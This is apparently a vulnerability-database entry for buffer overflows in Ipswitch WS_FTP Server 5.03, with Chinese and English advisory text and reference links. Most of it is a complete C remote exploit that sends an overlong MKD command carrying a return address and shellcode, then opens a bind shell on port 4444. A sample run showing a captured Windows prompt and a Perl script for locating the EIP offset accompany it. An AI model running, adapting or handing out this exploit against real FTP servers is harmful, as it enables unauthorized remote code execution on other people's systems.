https://www.exploit-db.com/exploits/664
https://www.securityfocus.com/bid/90537
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-152

WS_FTP是一款FTP服务端软件。WS_FTP服务器5.032004.10.14中存在多个缓冲溢出漏洞。远程攻击者可以通过超长的SITE、XMKD、MKD和RNFR命令导致服务崩溃，产生拒绝服务。

/*
no@0x00:~/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test
***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 21.
[x] Sending Login..done.
[x] Sending bad code..done.
[x] Checking if exploitation was successful..
[x] Connected to: 10.20.30.2 on port 4444.
[x] 0wn3d!

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:WINNTsystem32>

Greetz to Reed Arvin, NtWaK0,kane,schap, and kamalo :)

*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <errno.h>

#define PORT 21
#define RPORT 4444
#define RET "x53x9Bx2Ex7C" /*win2k sp4*/

char shellcode[]=
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xb1xbe"
"x94x1dx83xebxfcxe2xf4x4dx56xc2x1dxb1xbexc7x48xe7"
"xe9x1fx71x95xa6x1fx58x8dx35xc0x18xc9xbfx7ex96xfb"
"xa6x1fx47x91xbfx7fxfex83xf7x1fx29x3axbfx7ax2cx4e"
"x42xa5xddx1dx86x74x69xb6x7fx5bx10xb0x79x7fxefx8a"
"xc2xb0x09xc4x5fx1fx47x95xbfx7fx7bx3axb2xdfx96xeb"
"xa2x95xf6x3axbax1fx1cx59x55x96x2cx71xe1xcax40xea"
"x7cx9cx1dxefxd4xa4x44xd5x35x8dx96xeaxb2x1fx46xad"
"x35x8fx96xeaxb6xc7x75x3fxf0x9axf1x4ex68x1dxdax30"
"x52x94x1cxb1xbexc3x4bxe2x37x71xf5x96xbex94x1dx21"
"xbfx94x1dx07xa7x8cxfax15xa7xe4xf4x54xf7x12x54x15"
"xa4xe4xdax15x13xbaxf4x68xb7x61xb0x7ax53x68x26xe6"
"xedxa6x42x82x8cx94x46x3cxf5xb4x4cx4ex69x1dxc2x38"
"x7dx19x68xa5xd4x93x44xe0xedx6bx29x3ex41xc1x19xe8"
"x37x90x93x53x4cxbfx3axe5x41xa3xe2xe4x8exa5xddxe1"
"xeexc4x4dxf1xeexd4x4dx4exebxb8x94x76x8fx4fx4exe2"
"xd6x96x1dxa0xe2x1dxfdxdbxaexc4x4ax4exebxb0x4exe6"
"x41xc1x35xe2xeaxc3xe2xe4x9ex1dxdaxd9xfdxd9x59xb1"
"x37x77x9ax4bx8fx54x90xcdx9ax38x77xa4xe7x67xb6x36"
"x44x17xf1xe5x78xd0x39xa1xfaxf2xdaxf5x9axa8x1cxb0"
"x37xe8x39xf9x37xe8x39xfdx37xe8x39xe1x33xd0x39xa1"
"xeaxc4x4cxe0xefxd5x4cxf8xefxc5x4exe0x41xe1x1dxd9"
"xccx6axaexa7x41xc1x19x4ex6ex1dxfbx4excbx94x75x1c"
"x67x91xd3x4exebx90x94x72xd4x6bxe2x87x41x47xe2xc4"
"xbexfcxedx3bxbaxcbxe2xe4xbaxa5xc6xe2x41x44x1d";

struct sockaddr_in hrm;

void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;

while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);

if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;

if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}

if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}

int conn(char *ip,int p)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_addr.s_addr = inet_addr(ip);
hrm.sin_port = htons(p);
bzero(&(hrm.sin_zero),8);
sockfd=socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr))) < 0)
{
perror("connect");
exit(0);
}

printf("[x] Connected to: %s on port %d.n",ip,p);

return sockfd;
}

int main(int argc, char *argv[])
{
printf("***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***n");
if(argc<4)
{
fprintf(stderr,"Usage: IP USER PASSn");
exit(0);
}

char *buffer=malloc(954),*A=malloc(519),*B=malloc(32),*target=argv[1],*user=malloc(32),*pass=malloc(32),*request=malloc(32);
int x,y;
memset(request,'',32);
memset(user,'',32);
memset(pass,'',32);
memset(buffer,'',954);
memset(A,0x41,519);
memset(B,0x42,32);

strcpy(user,argv[2]);
strcpy(pass,argv[3]);

strcat(buffer,A);
strcat(buffer,RET);
strcat(buffer,B);
strcat(buffer,shellcode);

sprintf(request,"USER %srnPASS %srn",user,pass);

x = conn(target,PORT);
printf("[x] Sending Login..");
write(x,request,strlen(request));
printf("done.n");
sleep(2);

printf("[x] Sending bad code..");
write(x,"MKD ",4);
write(x,buffer,954);
write(x,"rn",2);
printf("done.n");
sleep(2);
close(x);
printf("[x] Checking if exploitation was successful..n");
y=conn(target,RPORT);
printf("[x] 0wn3d!nn");
shell(y);
close(y);
}

/*
Helper script:
The following Perl script can be used to find the coordinates for A and B so that the RET address affects the EIP and the shellcode is executed.

#!/usr/bin/perl
# WS_FTP RET Address finder
# Noam Rathaus of Beyond Security Ltd.
#

use strict;
use IO::Socket::INET;

usage() unless (@ARGV >= 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to the host.n";

$socket->autoflush(1);
while (<$socket>)
{
print $_;
if (/220 /)
{
last;
}
}

print $socket "USER noamn";
while (<$socket>)
{
print $_;
if (/331 /)
{
last;
}
}

print $socket "PASS passwordn";
while (<$socket>)
{
print $_;
if (/230 /)
{
last;
}
}

my $RET = 4;
my $size = 2000;
my $presize = shift(@ARGV) || 200;
my $postsize = shift(@ARGV) || 800;

print $socket "MKD ".("A"x$presize)."DEEF".("B"x($size - $presize - $postsize - $RET)).("C"x$postsize)."n";

while (<$socket>)
{
print $_;
}

print "Done.n";

close($socket);
exit(0);

sub usage
{
print "nws_ftp.pl MKD aligment assistantn";
print "nUsage: ws_ftp.pl [host] [port] [pre] [post]n";
print "We generate something of the sorts of "A"xpre "DEEF" "B"x(2000-pre-post-4) "C"xpost.n";
print "You need to align your pre and post so that the EIP is DEEF 0x44454546n";
print "n";
exit(1);
}

*/

// milw0rm.com [2004-11-29]

Ipswitch WS FTP Server 5.03

来源:XF
名称:wsftp-ftp-commands-bo(18296)
链接:http://xforce.iss.net/xforce/xfdb/18296
来源:MISC
链接:http://www.securiteam.com/exploits/6D00L2KBPG.html
来源:BUGTRAQ
名称:20041129MultiplebufferoverlowsinWS_FTPServerVersion5.03,2004.10.14.
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110177654524819&w;=2
来源:FULLDISC
名称:20041129MultiplebufferoverlowsinWS_FTPServerVersion5.03,2004.10.14.
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/029600.html